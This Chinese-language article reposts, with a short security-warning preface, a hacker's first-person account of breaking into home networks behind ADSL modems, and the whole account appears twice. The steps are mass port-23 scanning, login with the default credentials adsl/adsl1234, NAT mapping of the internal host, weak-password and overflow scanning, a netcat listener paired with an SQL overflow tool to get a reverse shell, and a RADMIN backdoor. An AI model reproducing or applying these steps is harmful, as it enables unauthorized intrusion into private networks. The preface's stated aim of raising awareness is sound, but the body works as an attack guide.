这是一位所谓的
"
黑客
"
的口述,你不妨看一下,也许你看完后对他的技术性做法不是完全明白,但是你肯定会感到一身冷汗,因为我们现在使用
ADSL
已经日益广泛,但我们的安全意识还不是很强
.
听完他的口述希望大家在日后能加强安全防范
!
口述 :
也许看烂了网上已有的常规黑客攻击手段,对一些陈旧的入侵手法早已厌烦,近来我对 ADSL MODEM 的路由功能产生了浓厚的兴趣,经过一番努力,我终于找到了穿透 ADSL 路由入侵内网的方法,在这里和各位一起分享我的心得。
一 . 扫描
现在很多 ADSL MODEM 都是通过 80 23 21 三个端口来管理,但 80 21 端口有很多服务器都有打开,没怎么特征性,于是我选择了 23 端口,打开我的至爱 :SUPPERSCAN ,填上我所在地区的 IP 段, ( 跨多几段都没关系,反正 SUPPERSCAN 的速度就是快 ) 眨眼间,结果出来了,开 23 的主机还真不小啊 :) 我挑了几台出来,在浏览器那里输入 IP:218.xxx.xxx.xxx , OK 。登陆对话框出来了,输入 USER:ADSL pass:adsl1234( 因为我这里的 adsl modem 一般是华硕的,缺省是 adsl adsl1234)bingle 一矢中的,现在我就是上帝。
二 . 映射
入侵已经成功了一半,要进一步入侵内网,我们要进行端口映射,但是我连内网的拓扑,都不知道 ( 更不用说内网主机的端口开放情况了 ) 又怎么映射呢 ? 在此,我选择了猜测。一般来说, MODEM 的内网 IP 缺省是 192.168.1.1 ,而大多数就把自己主机的 IP 设成 192.168.1.2 。因此我们只要试试把 192.168.1.2 的端口映射出来就行了 ( 但如果使用了 dhcp 就麻烦了 ) 。但是 192.168.1.2 到底开放了什么端口,我们根本就不知道啊,呵呵,既然不知道,那么我就把他整台主机透明地映射到外网,具体做法如下 : 进入 NAT 选项 --- 添加 NAT 规则 ---BAMID--- 填入主机 IP:192.168.1.2 ,到此 192.168.1.2 已经透明地映射到 192.168.1.1 上了,我们访问 ADSL MODEM 就等于访问主机 192.168.1.2 了
三 . 检测漏洞
现在我们再请出 SUPPERSCAN 对 218.xxx.xxx.xxx 进行扫描,呵,看到没有 ? 扫描结果已经不同了,开放的端口是 139 1433 等,刚才只是开放了 80 23 21 而已 ( 也就是说我们的映射已经成功了 ) 该是 X-SCAN 出手了,用它来扫弱口令最好不过了,但扫描的结果令人失望,一个弱口令也没有,看来管理员还不算低 B 啊。
四 . 溢出
既然没有弱口令,也没开 80 ,那只好从溢出方面着手了,但没开 80 21 也就 webdav .sevr-u 的溢出没戏了,很自然,我向导了 RPC 溢出,但实践证明 RPC 溢出也是不行的, LSASS 溢出也不行 。
五 . 募然回首,那人却在,灯火阑珊处
看来这管理员还是比较负责的,该打的补丁都打上了,这时侯,我的目光转移到 1433 上了 ( 嘿,不知道他打了 SQL 补丁没有 ?) 心动不如行动,现在只好死马当活马医了,于是
nc -v -l 99
sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99
bingle 成功地得到一个 shell 了。
六 . 设置后门
到这里,我们的入侵已经成功了,余下的是扫尾留后门,至于后门,我一般都是用 FTP 上传 RADMIN 上去的,呵呵,这里不详谈了,相信各位都知道
口述 :
也许看烂了网上已有的常规黑客攻击手段,对一些陈旧的入侵手法早已厌烦,近来我对 ADSL MODEM 的路由功能产生了浓厚的兴趣,经过一番努力,我终于找到了穿透 ADSL 路由入侵内网的方法,在这里和各位一起分享我的心得。
一 . 扫描
现在很多 ADSL MODEM 都是通过 80 23 21 三个端口来管理,但 80 21 端口有很多服务器都有打开,没怎么特征性,于是我选择了 23 端口,打开我的至爱 :SUPPERSCAN ,填上我所在地区的 IP 段, ( 跨多几段都没关系,反正 SUPPERSCAN 的速度就是快 ) 眨眼间,结果出来了,开 23 的主机还真不小啊 :) 我挑了几台出来,在浏览器那里输入 IP:218.xxx.xxx.xxx , OK 。登陆对话框出来了,输入 USER:ADSL pass:adsl1234( 因为我这里的 adsl modem 一般是华硕的,缺省是 adsl adsl1234)bingle 一矢中的,现在我就是上帝。
二 . 映射
入侵已经成功了一半,要进一步入侵内网,我们要进行端口映射,但是我连内网的拓扑,都不知道 ( 更不用说内网主机的端口开放情况了 ) 又怎么映射呢 ? 在此,我选择了猜测。一般来说, MODEM 的内网 IP 缺省是 192.168.1.1 ,而大多数就把自己主机的 IP 设成 192.168.1.2 。因此我们只要试试把 192.168.1.2 的端口映射出来就行了 ( 但如果使用了 dhcp 就麻烦了 ) 。但是 192.168.1.2 到底开放了什么端口,我们根本就不知道啊,呵呵,既然不知道,那么我就把他整台主机透明地映射到外网,具体做法如下 : 进入 NAT 选项 --- 添加 NAT 规则 ---BAMID--- 填入主机 IP:192.168.1.2 ,到此 192.168.1.2 已经透明地映射到 192.168.1.1 上了,我们访问 ADSL MODEM 就等于访问主机 192.168.1.2 了
三 . 检测漏洞
现在我们再请出 SUPPERSCAN 对 218.xxx.xxx.xxx 进行扫描,呵,看到没有 ? 扫描结果已经不同了,开放的端口是 139 1433 等,刚才只是开放了 80 23 21 而已 ( 也就是说我们的映射已经成功了 ) 该是 X-SCAN 出手了,用它来扫弱口令最好不过了,但扫描的结果令人失望,一个弱口令也没有,看来管理员还不算低 B 啊。
四 . 溢出
既然没有弱口令,也没开 80 ,那只好从溢出方面着手了,但没开 80 21 也就 webdav .sevr-u 的溢出没戏了,很自然,我向导了 RPC 溢出,但实践证明 RPC 溢出也是不行的, LSASS 溢出也不行 。
五 . 募然回首,那人却在,灯火阑珊处
看来这管理员还是比较负责的,该打的补丁都打上了,这时侯,我的目光转移到 1433 上了 ( 嘿,不知道他打了 SQL 补丁没有 ?) 心动不如行动,现在只好死马当活马医了,于是
nc -v -l 99
sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99
bingle 成功地得到一个 shell 了。
六 . 设置后门
到这里,我们的入侵已经成功了,余下的是扫尾留后门,至于后门,我一般都是用 FTP 上传 RADMIN 上去的,呵呵,这里不详谈了,相信各位都知道